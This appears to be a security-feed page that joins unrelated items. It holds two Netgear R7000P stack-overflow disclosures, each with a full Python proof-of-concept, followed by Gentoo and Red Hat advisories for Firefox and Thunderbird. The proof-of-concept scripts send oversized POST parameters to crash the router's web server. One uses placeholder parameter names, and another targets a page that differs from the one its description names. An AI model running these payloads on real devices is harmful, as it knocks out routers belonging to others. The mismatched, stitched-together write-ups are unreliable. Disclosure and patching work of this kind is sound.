This function accepts the POST parameter KEY1 without verifying its length, and copies an unbounded stack with strcpy which will result in a stack overflow. This vulnerability allows an attacker to cause denial of service (DoS).

It also happened in parameter KEY2.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'KEY1=' + p1 \# payload
p3 \= b"POST /WLG\_wireless\_dual\_band\_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44191: IoT_vuln/Netgear/R7000P/8 at main · RobinWang825/IoT_vuln

Netgear R7000P V1.3.0.8, V1.3.1.64 is vulnerable to Buffer Overflow via parameters: stamode_dns1_pri and stamode_dns1_sec.

**Netgear R7000P has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.netgear.com
2.  firmware download: http://www.downloads.netgear.com/files/GDC/R7000P/R7000P-V1.3.0.8\_1.0.93.zip

http://www.downloads.netgear.com/files/GDC/R7000P/R7000P-V1.3.1.64\_10.1.36.zip

**Affected version**

V1.3.0.8, V1.3.1.64

**Vulnerability**

The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_62A2C function, which can be accessed via the URL http://routerlogin.net/DIG_reboot_wireless.htm.

In this function, stamode_dns1_pri is controllable and will be passed into the v109 variable and v109 will be passed into stack s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

Also, stamode_dns1_sec is controllable and will be passed into the v108 variable and v108 will be passed into stack s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'stamode\_dns1\_pri=' + p1 \# payload
p3 \= b"POST /WLG\_wireless\_dual\_band\_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44200: IoT_vuln/Netgear/R7000P/17 at main · RobinWang825/IoT_vuln

Gentoo Linux Security Advisory 202211-6 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could result in arbitrary code execution. Versions less than 102.5.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: November 22, 2022  
     Bugs: #881403  
       ID: 202211-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could result in arbitrary code execution.

Background  
=========  
Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/firefox         < 102.5.0:esr          >= 102.5.0:esr  
                                < 107.0:rapid          >= 107.0:rapid  
  2  www-client/firefox-bin     < 102.5.0:esr          >= 102.5.0:esr  
                                < 107.0:rapid          >= 107.0:rapid

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-102.5.0"

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-102.5.0"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-107.0"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-107.0"

References  
=========  
[ 1 ] CVE-2022-40674  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40674  
[ 2 ] CVE-2022-45403  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45403  
[ 3 ] CVE-2022-45404  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45404  
[ 4 ] CVE-2022-45405  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45405  
[ 5 ] CVE-2022-45406  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45406  
[ 6 ] CVE-2022-45407  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45407  
[ 7 ] CVE-2022-45408  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45408  
[ 8 ] CVE-2022-45409  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45409  
[ 9 ] CVE-2022-45410  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45410  
[ 10 ] CVE-2022-45411  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45411  
[ 11 ] CVE-2022-45412  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45412  
[ 12 ] CVE-2022-45413  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45413  
[ 13 ] CVE-2022-45415  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45415  
[ 14 ] CVE-2022-45416  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45416  
[ 15 ] CVE-2022-45417  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45417  
[ 16 ] CVE-2022-45418  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45418  
[ 17 ] CVE-2022-45419  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45419  
[ 18 ] CVE-2022-45420  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45420  
[ 19 ] CVE-2022-45421  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45421

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202211-06

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-06

Red Hat Security Advisory 2022-8561-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.5.0. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:8561-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8561  
Issue date:        2022-11-21  
CVE Names:         CVE-2022-45403 CVE-2022-45404 CVE-2022-45405  
                   CVE-2022-45406 CVE-2022-45408 CVE-2022-45409  
                   CVE-2022-45410 CVE-2022-45411 CVE-2022-45412  
                   CVE-2022-45416 CVE-2022-45418 CVE-2022-45420  
                   CVE-2022-45421  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.5.0.

Security Fix(es):

* Mozilla: Service Workers might have learned size of cross-origin media  
files (CVE-2022-45403)

* Mozilla: Fullscreen notification bypass (CVE-2022-45404)

* Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)

* Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)

* Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)

* Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)

* Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5  
(CVE-2022-45421)

* Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie  
policy (CVE-2022-45410)

* Mozilla: Cross-Site Tracing was possible via non-standard override  
headers (CVE-2022-45411)

* Mozilla: Symlinks may resolve to partially uninitialized buffers  
(CVE-2022-45412)

* Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)

* Mozilla: Custom mouse cursor could have been drawn over browser UI  
(CVE-2022-45418)

* Mozilla: Iframe contents could be rendered outside the iframe  
(CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files  
2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass  
2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation  
2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm  
2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName  
2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection  
2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy  
2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers  
2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers  
2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage  
2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI  
2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe  
2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-102.5.0-2.el9_1.src.rpm

aarch64:  
thunderbird-102.5.0-2.el9_1.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el9_1.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el9_1.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el9_1.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el9_1.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el9_1.ppc64le.rpm

s390x:  
thunderbird-102.5.0-2.el9_1.s390x.rpm  
thunderbird-debuginfo-102.5.0-2.el9_1.s390x.rpm  
thunderbird-debugsource-102.5.0-2.el9_1.s390x.rpm

x86_64:  
thunderbird-102.5.0-2.el9_1.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el9_1.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45403  
https://access.redhat.com/security/cve/CVE-2022-45404  
https://access.redhat.com/security/cve/CVE-2022-45405  
https://access.redhat.com/security/cve/CVE-2022-45406  
https://access.redhat.com/security/cve/CVE-2022-45408  
https://access.redhat.com/security/cve/CVE-2022-45409  
https://access.redhat.com/security/cve/CVE-2022-45410  
https://access.redhat.com/security/cve/CVE-2022-45411  
https://access.redhat.com/security/cve/CVE-2022-45412  
https://access.redhat.com/security/cve/CVE-2022-45416  
https://access.redhat.com/security/cve/CVE-2022-45418  
https://access.redhat.com/security/cve/CVE-2022-45420  
https://access.redhat.com/security/cve/CVE-2022-45421  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3vJwdzjgjWX9erEAQhnUg//evEIK/8jBt56rDj9c45gX63Es3IGl11Z  
FZ97RFyfLc84Dmff8PpwTXSOXh7wk2el/Z+RTVKIJxonJlXEbyOKCNnUzm646U8O  
rFoYgrAB4LVkBvULrNOK5PS0VNkzboQSFZV2VjRENSGJOZcSA8wy55kQEVjwD8W0  
MWxukUbl6iDMk+7hfT+wCDXHzd1o51/RJWiL/y9ajFokzVi7Wvru9mQO1KhR/JlM  
gU/QU8NXHOOp6MgXRqBX0l5IiCt7AYfGfe1F4jPyzJ16aOM+twmCdxvAtRvvkK93  
mXIoaMXZr5iVvxT8xrCKj7yknHYTCoYQZa7Pv9vv8h3Hb/IQ0gnV32L+kO/fq61x  
GomZHzVpkHlcR0INE2EjdcN0KVS/Ps40QsAJOg6jPlQwckvxYoLVA+mzlfOZVWSN  
LM7jcCe3Ua71NTUHv/d7Qtkj6AqVbuhaGCuqgSoHVgAuHrCQ1My33yjSP6NrYuc9  
FDmExHJLn9jY5jsLQ2V9601L31CpOYwkavn1s2/sp8pOW2ESSp1cGX8u5GnaVsE+  
gUlUx232wmK/RdW4VWBmn4jyULCEttuVf2rjtGuZHsqPBVnlFKFKoG5rygVxJHFi  
FccBzbIqGjn9SNBIC2MFCiUi5QMPN0ymxcDRFwjWgQudZfhk8fPhX6wTOhAA2W6l  
F0U30Bem0zE«3N  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#firefox